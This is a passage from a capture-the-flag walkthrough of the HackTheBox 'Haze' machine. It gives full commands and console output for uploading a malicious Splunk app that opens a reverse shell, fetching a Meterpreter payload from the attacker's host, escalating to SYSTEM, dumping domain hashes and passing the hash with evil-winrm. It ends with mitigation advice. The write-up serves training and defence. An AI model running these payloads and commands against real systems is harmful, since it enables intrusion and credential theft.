|
After editing the IP and port, repackage the app:
1
2
| tar -cvzf reverse_shell_splunk.tgz reverse_shell_splunk
mv reverse_shell_splunk.tgz reverse_shell_splunk.spl
|
Start Metasploit to catch the PowerShell reverse shell:
1
2
3
4
5
6
| use exploit/multi/handler
set payload windows/powershell_reverse_tcp
set LHOST 10.10.xx.xxx
set LPORT 2004
set ExitOnSession false
exploit -j
|
Log into the Splunk web interface at http://haze.htb:8000 with alexander.green:Sp1unkadmin@2k24. Navigate to Apps → Manage Apps → Install app from file to upload the malicious .spl package.
Install app from file
1
| http://haze.htb:8000/en-US/manager/appinstall/_upload
|
Upload the malicious .spl to trigger the shell:
Check the Metasploit console for the incoming session:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| Metasploit Documentation: https://docs.metasploit.com/
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.XXX.XXX
LHOST => 10.10.XXX.XXX
msf6 exploit(multi/handler) > set LPORT 2004
LPORT => 2004
msf6 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.XXX.XXX:2004
msf6 exploit(multi/handler) > [*] Powershell session 1 opened (10.10.XXX.XXX:2004 -> 10.10.11.61:51413) at 2025-04-01 05:43:30 +0530
msf6 exploit(multi/handler) > sessions
Active sessions
================
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 powershell windows 10.10.XXX.XXX:2004 -> 10.10.11.61:51413 (10.10.11.61)
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
PS C:\Windows\system32>
|
The PowerShell session runs as the Splunk service account which has SeImpersonatePrivilege. We’ll upgrade to a Meterpreter session to exploit this for SYSTEM escalation.
First, generate a Meterpreter payload and serve it via HTTP:
1
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.xx.xx LPORT=4444 -f exe -o shell.exe
|
Set up a Python HTTP server in the directory containing shell.exe, then in the PowerShell session, download and execute it:
1
| Invoke-WebRequest -Uri "http://10.10.xx.xxx:8080/shell.exe" -OutFile "C:\Temp\shell.exe"
|
Background the PowerShell session (Ctrl+Z, then y), and set up a new Metasploit handler for the Meterpreter payload:
1
2
3
4
5
| use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.xx.xx
set LPORT 4444
exploit -j
|
Once the Meterpreter session arrives, use getsystem to escalate to SYSTEM:
With SYSTEM privileges, retrieve the root flag and dump all domain hashes:
1
| type C:\Users\Administrator\Desktop\root.txt
|
1
2
3
4
5
6
7
8
9
10
11
| meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:06dc954d32cb91ac2831d67e3e12027f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:937e28202a6cdfcc556d1b677bcbe82c:::
paul.taylor:1103:aad3b435b51404eeaad3b435b51404ee:e90878e2fb0a21a11859ff60f1119fb4:::
mark.adams:1104:aad3b435b51404eeaad3b435b51404ee:e90878e2fb0a21a11859ff60f1119fb4:::
edward.martin:1105:aad3b435b51404eeaad3b435b51404ee:09e0b3eeb2e7a6b0d419e9ff8f4d91af:::
alexander.green:1106:aad3b435b51404eeaad3b435b51404ee:6b8caa0cd4f8cb8ddf2b5677a24cc510:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:9dcbc33adec3bdc8b2334060002ce1b4:::
Haze-IT-Backup$:1111:aad3b435b51404eeaad3b435b51404ee:735c02c6b2dc54c3c8c6891f55279ebc:::
meterpreter >
|
1
| evil-winrm -i 10.10.11.61 -u administrator -H '06dc954d32cb91ac2831d67e3e12027f'
|
Mitigations & Security Recommendations
- Update Splunk Installation: Ensure that the Splunk instance is updated to patch CVE-2024-36991 (arbitrary directory traversal and file read). Remove public read access to Splunk endpoints.
- Implement gMSA Least Privilege Principle: Restrict access to the
msDS-GroupMSAMembership configuration parameters. Unprivileged users (such as mark.adams) should not be granted management privileges (via gMSA_Managers group membership) over critical backup service accounts (Haze-IT-Backup$). - Control Active Directory Ownership Changes: Strictly audit permissions regarding Active Directory object ownership. Prevent service accounts like
Haze-IT-Backup$ from having WriteOwner privileges over other sensitive users or administrative groups (SUPPORT_SERVICES). - Prevent Shadow Credentials Abuse: Audit changes to the
msDS-KeyCredentialLink attribute in Active Directory to prevent attackers from registering public key certificates for PKINIT authentication bypass. Enforce Smart Card or certificate registration restrictions via domain controllers. - Secure Splunk Administrative Controls: Decouple Splunk applications from running as elevated accounts like
NT AUTHORITY\SYSTEM. Run the Splunk service as a dedicated low-privilege service account without SeImpersonatePrivilege or other dangerous token impersonation capabilities. Ensure Splunk administrator credentials (such as alexander.green’s password Sp1unkadmin@2k24) are highly secure and regularly rotated.